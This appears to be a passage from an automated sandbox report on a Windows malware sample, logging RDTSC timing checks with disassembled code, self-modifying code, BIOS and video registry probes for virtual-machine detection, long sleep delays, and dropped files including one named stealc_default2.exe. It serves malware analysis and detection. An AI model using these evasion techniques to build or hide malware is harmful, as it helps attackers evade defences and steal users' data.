Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE03F5 second address: 4AE042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7914BECDh 0x00000009 adc cx, 82C6h 0x0000000e jmp 00007FAF7914BED1h 0x00000013 popfd 0x00000014 mov bl, al 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test byte ptr [esi+48h], 00000001h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE042C second address: 4AE0432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0432 second address: 4AE047F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAFEB59A11Ah 0x0000000f jmp 00007FAF7914BED6h 0x00000014 test bl, 00000007h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FAF7914BECDh 0x0000001f mov ch, 6Ch 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0721 second address: 4AD0789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FAF78D3F537h 0x00000010 push esi 0x00000011 mov edi, 1C602FAAh 0x00000016 pop edi 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FAF78D3F52Eh 0x0000001e mov ebp, esp 0x00000020 jmp 00007FAF78D3F530h 0x00000025 and esp, FFFFFFF8h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0789 second address: 4AD078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD078D second address: 4AD0791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0791 second address: 4AD0797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0797 second address: 4AD07B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c mov eax, ebx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD07B9 second address: 4AD07BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD07BD second address: 4AD07FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FAF78D3F52Bh 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FAF78D3F536h 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD07FE second address: 4AD0802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0802 second address: 4AD0806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0806 second address: 4AD080C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD080C second address: 4AD081B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF78D3F52Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD081B second address: 4AD087E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAF7914BED1h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FAF7914BECEh 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push edi 0x0000001e pop eax 0x0000001f call 00007FAF7914BED9h 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD087E second address: 4AD08E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, B623h 0x00000007 pushfd 0x00000008 jmp 00007FAF78D3F538h 0x0000000d adc si, 6168h 0x00000012 jmp 00007FAF78D3F52Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b sub ebx, ebx 0x0000001d pushad 0x0000001e mov cx, di 0x00000021 call 00007FAF78D3F531h 0x00000026 push eax 0x00000027 pop ebx 0x00000028 pop eax 0x00000029 popad 0x0000002a test esi, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movzx eax, dx 0x00000032 call 00007FAF78D3F531h 0x00000037 pop ecx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD08E8 second address: 4AD0985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAF7914BECCh 0x00000008 pop esi 0x00000009 jmp 00007FAF7914BECBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007FAFEB5A194Eh 0x00000017 pushad 0x00000018 mov bh, cl 0x0000001a pushfd 0x0000001b jmp 00007FAF7914BED1h 0x00000020 sbb eax, 79114CF6h 0x00000026 jmp 00007FAF7914BED1h 0x0000002b popfd 0x0000002c popad 0x0000002d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000034 jmp 00007FAF7914BECEh 0x00000039 mov ecx, esi 0x0000003b jmp 00007FAF7914BED0h 0x00000040 je 00007FAFEB5A1908h 0x00000046 jmp 00007FAF7914BED0h 0x0000004b test byte ptr [76FB6968h], 00000002h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov dx, cx 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0985 second address: 4AD09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAFEB194F3Eh 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edi 0x00000012 mov si, 1BABh 0x00000016 popad 0x00000017 mov edx, dword ptr [ebp+0Ch] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bh, 0Dh 0x0000001f mov dl, ch 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD09B7 second address: 4AD0A14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7914BECCh 0x00000009 or ah, 00000068h 0x0000000c jmp 00007FAF7914BECBh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FAF7914BED8h 0x00000018 adc si, 06C8h 0x0000001d jmp 00007FAF7914BECBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b popad 0x0000002c mov bx, C810h 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A14 second address: 4AD0A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF78D3F531h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A2A second address: 4AD0A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007FAF7914BED3h 0x0000000b add eax, 72BCC31Eh 0x00000011 jmp 00007FAF7914BED9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A6D second address: 4AD0A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A71 second address: 4AD0A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A84 second address: 4AD0A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF78D3F534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0B30 second address: 4AD0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0B36 second address: 4AD0B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0B3A second address: 4AD0B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0E7D second address: 4AE0E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0E81 second address: 4AE0E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0E87 second address: 4AE0EB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F52Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF78D3F537h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0EB3 second address: 4AE0EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0EB9 second address: 4AE0ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF78D3F52Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0ED1 second address: 4AE0F26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7914BED7h 0x00000009 or ecx, 1FC8E6EEh 0x0000000f jmp 00007FAF7914BED9h 0x00000014 popfd 0x00000015 mov eax, 69CEB277h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ecx, ebx 0x00000023 jmp 00007FAF7914BECBh 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0F26 second address: 4AE0F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0F2C second address: 4AE0F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0F30 second address: 4AE0F58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FAF78D3F537h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0F58 second address: 4AE0F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0F5C second address: 4AE0F77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0B87 second address: 4AE0B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0B8B second address: 4AE0B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0B8F second address: 4AE0B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0B95 second address: 4AE0BB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 30h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0BB4 second address: 4AE0BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A786h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAF7914BED4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0BD7 second address: 4AE0C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push ecx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop eax 0x00000011 pop edi 0x00000012 call 00007FAF78D3F52Ah 0x00000017 pop edx 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FAF78D3F533h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60637 second address: 4B6063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6063C second address: 4B60665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF78D3F52Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60665 second address: 4B6066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50931 second address: 4B5094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F52Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, FB16h 0x00000011 mov bx, B2A2h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5094D second address: 4B50972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50972 second address: 4B50977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50977 second address: 4B5098B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov si, 65BDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, 68h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50772 second address: 4B50776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50776 second address: 4B5077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5077C second address: 4B50782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50782 second address: 4B50786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0317 second address: 4AF0349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0B6FFA8Bh 0x00000008 pushfd 0x00000009 jmp 00007FAF78D3F530h 0x0000000e add al, FFFFFF98h 0x00000011 jmp 00007FAF78D3F52Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0349 second address: 4AF035B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50B55 second address: 4B50BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007FAF78D3F52Bh 0x0000000b jmp 00007FAF78D3F533h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov ax, 65DBh 0x0000001a mov cx, 84B7h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FAF78D3F52Dh 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov al, dh 0x0000002b jmp 00007FAF78D3F534h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50BB1 second address: 4B50BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 07F366B4h 0x00000008 mov bx, 3A20h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 mov al, 1Dh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50BCA second address: 4B50BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50C31 second address: 4B50C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50C37 second address: 4B50C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50C3B second address: 4B50C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EE17FC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EE1414 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F6E689 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: A517FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: A51414 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: ADE689 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Special instruction interceptor: First address: 88EC19 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Special instruction interceptor: First address: A54A91 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Special instruction interceptor: First address: ABEAD0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Special instruction interceptor: First address: 78363E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Special instruction interceptor: First address: 5DDB12 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Special instruction interceptor: First address: 7944F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Special instruction interceptor: First address: 8149EF instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory allocated: DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory allocated: 1A820000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04B50B29 rdtsc

0_2_04B50B29

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 716	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1160	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 978	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1143	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1155	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1179	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1135	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window / User API: threadDelayed 1203
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window / User API: threadDelayed 1188
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window / User API: threadDelayed 1169
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window / User API: threadDelayed 1203
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window / User API: threadDelayed 1230
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Window / User API: threadDelayed 1168

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\J4EDANXSATRMSXZUEQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XLN9V631J4Y45UE4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
